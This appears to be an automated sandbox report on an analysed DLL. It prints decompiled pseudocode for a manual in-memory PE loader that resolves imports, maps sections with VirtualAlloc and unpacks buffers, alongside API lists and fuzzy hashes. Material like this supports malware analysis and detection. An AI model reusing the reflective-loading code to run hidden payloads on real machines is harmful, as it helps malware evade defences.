                                                                                                                                                0x00000000
                                                                                                                                                0x1001a9d7
                                                                                                                                                0x1001a9da
                                                                                                                                                0x1001a9dd
                                                                                                                                                0x1001a9e1
                                                                                                                                                0x1001a9fd
                                                                                                                                                0x1001a9ff
                                                                                                                                                0x1001a9ff
                                                                                                                                                0x1001a9c3
                                                                                                                                                0x1001a9c3
                                                                                                                                                0x1001a9c6
                                                                                                                                                0x1001a9c6
                                                                                                                                                0x1001aa0a
                                                                                                                                                0x1001aa0b
                                                                                                                                                0x1001aa10
                                                                                                                                                0x00000000
                                                                                                                                                0x1001aa10
                                                                                                                                                0x1001a9b5
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA3C), ref: 1001AA42
                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,1001BA3C), ref: 1001AA49
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                • Opcode ID: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
                                                                                                                                                • Instruction ID: 4d02d4e2172aadf48441733df7480d9fc57cbb1c8efede5bdbb7e0f8d5fbe0c0
                                                                                                                                                • Opcode Fuzzy Hash: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
                                                                                                                                                • Instruction Fuzzy Hash: B431A178A00108EFDB04DF94CA94AADB7B6FF89304F248198E9055B395C775EE85DB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001ABA3, Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                			E1001ABA3() {
				signed int _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t106;
				signed int _t114;
				void* _t116;
				void* _t121;
				void* _t127;
				signed int _t173;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				L0:
				while(1) {
					L0:
					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
					_t186 = _t184 + 8;
					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
						_push(4 +  *_t17 * 4);
						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
						_push( *_t21);
						_t99 = E1000E018(_t127,  *_t21, _t180, _t181, __eflags);
						_t187 = _t186 + 8;
						 *(_t182 - 0x18) = _t99;
						__eflags =  *(_t182 - 0x18);
						if( *(_t182 - 0x18) != 0) {
							L7:
							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
							__eflags =  *( *(_t182 - 4));
							if( *( *(_t182 - 4)) == 0) {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								__eflags = _t106;
								 *(_t182 - 0x14) = _t106;
							} else {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
							}
							while(1) {
								L12:
								__eflags =  *( *(_t182 - 0x1c));
								if( *( *(_t182 - 0x1c)) == 0) {
									break;
								}
								L13:
								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
									__eflags = _t114;
									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t116;
								} else {
									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t121;
								}
								L16:
								__eflags =  *( *(_t182 - 0x14));
								if( *( *(_t182 - 0x14)) != 0) {
									L18:
									L11:
									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
									_t173 =  *(_t182 - 0x14) + 4;
									__eflags = _t173;
									 *(_t182 - 0x14) = _t173;
									continue;
								} else {
									L17:
									 *(_t182 - 0xc) = 0;
								}
								break;
							}
							L19:
							__eflags =  *(_t182 - 0xc);
							if(__eflags != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
							SetLastError(0xe);
							 *(_t182 - 0xc) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *(_t182 - 0xc) = 0;
					}
					break;
				}
				L22:
				_t93 =  *(_t182 - 0xc);
				return _t93;
			}


















                                                                                                                                                0x1001aba3
                                                                                                                                                0x1001aba3
                                                                                                                                                0x1001aba3
                                                                                                                                                0x1001aba9
                                                                                                                                                0x1001abba
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001abcd
                                                                                                                                                0x1001abd0
                                                                                                                                                0x1001abe1
                                                                                                                                                0x1001abe4
                                                                                                                                                0x1001abe6
                                                                                                                                                0x1001abe9
                                                                                                                                                0x1001abf0
                                                                                                                                                0x1001ac06
                                                                                                                                                0x1001ac09
                                                                                                                                                0x1001ac13
                                                                                                                                                0x1001ac17
                                                                                                                                                0x1001ac1a
                                                                                                                                                0x1001ac1b
                                                                                                                                                0x1001ac20
                                                                                                                                                0x1001ac23
                                                                                                                                                0x1001ac26
                                                                                                                                                0x1001ac2a
                                                                                                                                                0x1001ac56
                                                                                                                                                0x1001ac5c
                                                                                                                                                0x1001ac62
                                                                                                                                                0x1001ac68
                                                                                                                                                0x1001ac6e
                                                                                                                                                0x1001ac74
                                                                                                                                                0x1001ac7d
                                                                                                                                                0x1001ac83
                                                                                                                                                0x1001ac86
                                                                                                                                                0x1001acaa
                                                                                                                                                0x1001acb3
                                                                                                                                                0x1001acb3
                                                                                                                                                0x1001acb6
                                                                                                                                                0x1001ac88
                                                                                                                                                0x1001ac90
                                                                                                                                                0x1001ac9c
                                                                                                                                                0x1001ac9c
                                                                                                                                                0x1001accd
                                                                                                                                                0x1001accd
                                                                                                                                                0x1001acd0
                                                                                                                                                0x1001acd3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001acd5
                                                                                                                                                0x1001acda
                                                                                                                                                0x1001ace0
                                                                                                                                                0x1001ad12
                                                                                                                                                0x1001ad18
                                                                                                                                                0x1001ad1f
                                                                                                                                                0x1001ad1f
                                                                                                                                                0x1001ad2a
                                                                                                                                                0x1001ad2d
                                                                                                                                                0x1001ad2f
                                                                                                                                                0x1001ad35
                                                                                                                                                0x1001ace2
                                                                                                                                                0x1001ace5
                                                                                                                                                0x1001acfb
                                                                                                                                                0x1001acfe
                                                                                                                                                0x1001ad00
                                                                                                                                                0x1001ad06
                                                                                                                                                0x1001ad06
                                                                                                                                                0x1001ad37
                                                                                                                                                0x1001ad3a
                                                                                                                                                0x1001ad3d
                                                                                                                                                0x1001ad48
                                                                                                                                                0x1001acbb
                                                                                                                                                0x1001acc1
                                                                                                                                                0x1001acc7
                                                                                                                                                0x1001acc7
                                                                                                                                                0x1001acca
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad3d
                                                                                                                                                0x1001ad4d
                                                                                                                                                0x1001ad4d
                                                                                                                                                0x1001ad51
                                                                                                                                                0x1001ad73
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad53
                                                                                                                                                0x1001ad53
                                                                                                                                                0x1001ad56
                                                                                                                                                0x1001ad61
                                                                                                                                                0x1001ad64
                                                                                                                                                0x1001ad6b
                                                                                                                                                0x1001ad6b
                                                                                                                                                0x1001ac2c
                                                                                                                                                0x1001ac2c
                                                                                                                                                0x1001ac2f
                                                                                                                                                0x1001ac3a
                                                                                                                                                0x1001ac3d
                                                                                                                                                0x1001ac44
                                                                                                                                                0x1001ac4a
                                                                                                                                                0x1001ac4a
                                                                                                                                                0x1001abf2
                                                                                                                                                0x1001abf2
                                                                                                                                                0x1001abf4
                                                                                                                                                0x1001abfa
                                                                                                                                                0x1001abfa
                                                                                                                                                0x00000000
                                                                                                                                                0x1001abf0
                                                                                                                                                0x1001ad78
                                                                                                                                                0x1001ad78
                                                                                                                                                0x1001ad7e

                                                                                                                                                APIs
                                                                                                                                                • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                • _realloc.LIBCMT ref: 1001AC1B
                                                                                                                                                • SetLastError.KERNEL32(0000000E), ref: 1001AC44
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$Read_realloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 252108943-0
                                                                                                                                                • Opcode ID: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                • Instruction ID: fc8650bffc04b339d430b1508d1055308318352e03b6944bc6f0970fdcc69cd6
                                                                                                                                                • Opcode Fuzzy Hash: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                • Instruction Fuzzy Hash: B501EF74A00208EFDB04CF94C985B9DB7B1FF49359F608198E90AAB350C378EA81DB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001B300, Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                			E1001B300(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t95;
				void* _t100;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;

				_t141 = __esi;
				_t140 = __edi;
				_t100 = __ebx;
				_t2 = _a16 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_t6 =  *_a16 + 0x14; // 0x2b34508b
				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b95d
				_v24 =  *_a16 + _t8;
				_v8 = 0;
				while(1) {
					_t16 =  *_a16 + 6; // 0xe2e905
					if(_v8 >= ( *_t16 & 0x0000ffff)) {
						break;
					}
					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
						_t44 = _v24 + 0x14; // 0x2b34508b
						_t46 = _v24 + 0x10; // 0xb04d8b02
						_t78 = E1001AE40(_a8,  *_t44 +  *_t46);
						_t143 = _t142 + 8;
						if(_t78 != 0) {
							_t49 = _a16 + 0x34; // 0x8b0aeb18
							_t51 = _v24 + 0x10; // 0xb04d8b02
							_t54 = _v24 + 0xc; // 0x8bb8558b
							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
							_t144 = _t143 + 0x14;
							_v12 = _t82;
							if(_v12 != 0) {
								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
								E1000D190(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
								_t142 = _t144 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t25 = _a16 + 0x34; // 0x8b0aeb18
					_t29 = _v24 + 0xc; // 0x8bb8558b
					_t31 = _a16 + 0x1c; // 0x8b1874b4
					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
					_t145 = _t142 + 0x14;
					_v12 = _t95;
					if(_v12 != 0) {
						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E1000CF20(_t140, _v12, 0, _v16);
						_t142 = _t145 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}


















                                                                                                                                                0x1001b300
                                                                                                                                                0x1001b300
                                                                                                                                                0x1001b300
                                                                                                                                                0x1001b309
                                                                                                                                                0x1001b30c
                                                                                                                                                0x1001b319
                                                                                                                                                0x1001b31d
                                                                                                                                                0x1001b321
                                                                                                                                                0x1001b324
                                                                                                                                                0x1001b33f
                                                                                                                                                0x1001b344
                                                                                                                                                0x1001b34b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b358
                                                                                                                                                0x1001b3cf
                                                                                                                                                0x1001b3d5
                                                                                                                                                0x1001b3dd
                                                                                                                                                0x1001b3e2
                                                                                                                                                0x1001b3e7
                                                                                                                                                0x1001b3f0
                                                                                                                                                0x1001b3fe
                                                                                                                                                0x1001b408
                                                                                                                                                0x1001b40f
                                                                                                                                                0x1001b412
                                                                                                                                                0x1001b414
                                                                                                                                                0x1001b417
                                                                                                                                                0x1001b41e
                                                                                                                                                0x1001b42d
                                                                                                                                                0x1001b445
                                                                                                                                                0x1001b44a
                                                                                                                                                0x1001b453
                                                                                                                                                0x1001b32d
                                                                                                                                                0x1001b333
                                                                                                                                                0x1001b33c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b33c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b420
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b3e9
                                                                                                                                                0x1001b360
                                                                                                                                                0x1001b367
                                                                                                                                                0x1001b3c7
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b3c7
                                                                                                                                                0x1001b36c
                                                                                                                                                0x1001b381
                                                                                                                                                0x1001b388
                                                                                                                                                0x1001b38b
                                                                                                                                                0x1001b38d
                                                                                                                                                0x1001b390
                                                                                                                                                0x1001b397
                                                                                                                                                0x1001b3a9
                                                                                                                                                0x1001b3b2
                                                                                                                                                0x1001b3bf
                                                                                                                                                0x1001b3c4
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b3c4
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b399
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                • Opcode ID: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                • Instruction ID: a005275a1ccb32e2261c4421282f910c29d49b3246cd882dcb7603a91dee7caf
                                                                                                                                                • Opcode Fuzzy Hash: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                • Instruction Fuzzy Hash: 7951A7B4A0010ADFCB04DF94D991EAEB7B5FF48304F248599E915AB346D730EE91CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001AAF0, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AAF0(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}





                                                                                                                                                0x1001aaf8
                                                                                                                                                0x1001aafe
                                                                                                                                                0x1001ab05
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ab0b
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                • Opcode ID: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                • Instruction ID: 175513b2d3b99921c95d5b3868ca5ca2b884793c4c363252687910afe3f21655
                                                                                                                                                • Opcode Fuzzy Hash: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                • Instruction Fuzzy Hash: 4CD0927490924CEBCB10DFA4DA88A8EB7F8EB09251F208595FC0997201D631DE809AA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001AAC0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AAC0(struct HINSTANCE__* _a4) {
				int _t3;

				_t3 = FreeLibrary(_a4); // executed
				return _t3;
			}




                                                                                                                                                0x1001aac7
                                                                                                                                                0x1001aace

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                • Instruction ID: d41d78d4d80a0482e50fbcd51c543f3b4bec57f301915c91e4edb7b1fe7fc2cd
                                                                                                                                                • Opcode Fuzzy Hash: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                • Instruction Fuzzy Hash: E3B0123100030CBBCE005BD8E8888C53B9C96085117004000F60C83100C630F44046E4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000EBD1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E10015254();
				_push(_a4);
				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                0x1000ebd1
                                                                                                                                                0x1000ebd6
                                                                                                                                                0x1000ebe2
                                                                                                                                                0x1000ebe8

                                                                                                                                                APIs
                                                                                                                                                • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ___security_init_cookie
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3657697845-0
                                                                                                                                                • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10004520, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E10004520(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed char* _v56;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				char* _v148;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				void* _t63;
				void* _t70;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr _t86;
				intOrPtr _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t102 = __eflags;
				_t55 = _a4;
				_t96 = _a8;
				_v184 = E10004490;
				_v180 = E100044C0;
				_v176 = _t55;
				_v172 = _t55;
				_v168 = _t96;
				_t97 = 0;
				E100071F0();
				_v216 = E100046C0;
				_v212 = E100046E0;
				_v200 = E100046C0;
				_v196 = E100046E0;
				E10007530( &_v164, 0);
				_v136 = 0;
				_v136 = _v216( &_v216, _t96);
				_v132 = _t96;
				_v148 =  &_v184;
				_v140 = 0;
				_v144 = 0;
				E100048A0(_t102,  &_v128);
				_t63 = E10006FD0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
				_t100 =  &_v220 + 0x24;
				if(_t63 == 0) {
					_v204 = 0xffffffff;
					_v208 = 0;
					_v220 = 0;
					_v192 = 0;
					_v188 = 0;
					if(( *_v56 & 0x00000080) == 0) {
						_t70 = E10007010( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
						_t100 = _t100 + 0x28;
						if(_t70 == 0) {
							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
							_t97 = _t73;
							if(_t97 != 0) {
								_t76 = _a12;
								_t107 = _t76;
								_t86 = _v220;
								if(_t76 != 0) {
									 *_t76 = _t86;
								}
								E1000D190(0, _t96, _t97, _t97, _v208, _t86);
								_t100 = _t100 + 0xc;
								 *((char*)(_v220 + _t97)) = 0;
							}
							_v212( &_v216, _v208);
							_t100 = _t100 + 8;
						}
					}
				}
				E100048E0(_t107,  &_v128,  &_v216);
				return _t97;
			}






































                                                                                                                                                0x10004520
                                                                                                                                                0x10004526
                                                                                                                                                0x10004530
                                                                                                                                                0x10004537
                                                                                                                                                0x1000453f
                                                                                                                                                0x10004547
                                                                                                                                                0x1000454b
                                                                                                                                                0x1000454f
                                                                                                                                                0x10004555
                                                                                                                                                0x10004557
                                                                                                                                                0x10004562
                                                                                                                                                0x1000456a
                                                                                                                                                0x10004572
                                                                                                                                                0x1000457a
                                                                                                                                                0x10004582
                                                                                                                                                0x1000458d
                                                                                                                                                0x10004595
                                                                                                                                                0x100045a2
                                                                                                                                                0x100045a6
                                                                                                                                                0x100045aa
                                                                                                                                                0x100045ae
                                                                                                                                                0x100045b2
                                                                                                                                                0x100045ce
                                                                                                                                                0x100045d3
                                                                                                                                                0x100045d8
                                                                                                                                                0x100045e5
                                                                                                                                                0x100045ed
                                                                                                                                                0x100045f1
                                                                                                                                                0x100045f5
                                                                                                                                                0x100045f9
                                                                                                                                                0x10004600
                                                                                                                                                0x10004637
                                                                                                                                                0x1000463c
                                                                                                                                                0x10004641
                                                                                                                                                0x10004653
                                                                                                                                                0x10004659
                                                                                                                                                0x1000465d
                                                                                                                                                0x1000465f
                                                                                                                                                0x10004666
                                                                                                                                                0x10004668
                                                                                                                                                0x1000466c
                                                                                                                                                0x1000466e
                                                                                                                                                0x1000466e
                                                                                                                                                0x10004677
                                                                                                                                                0x10004680
                                                                                                                                                0x10004683
                                                                                                                                                0x10004683
                                                                                                                                                0x10004690
                                                                                                                                                0x10004694
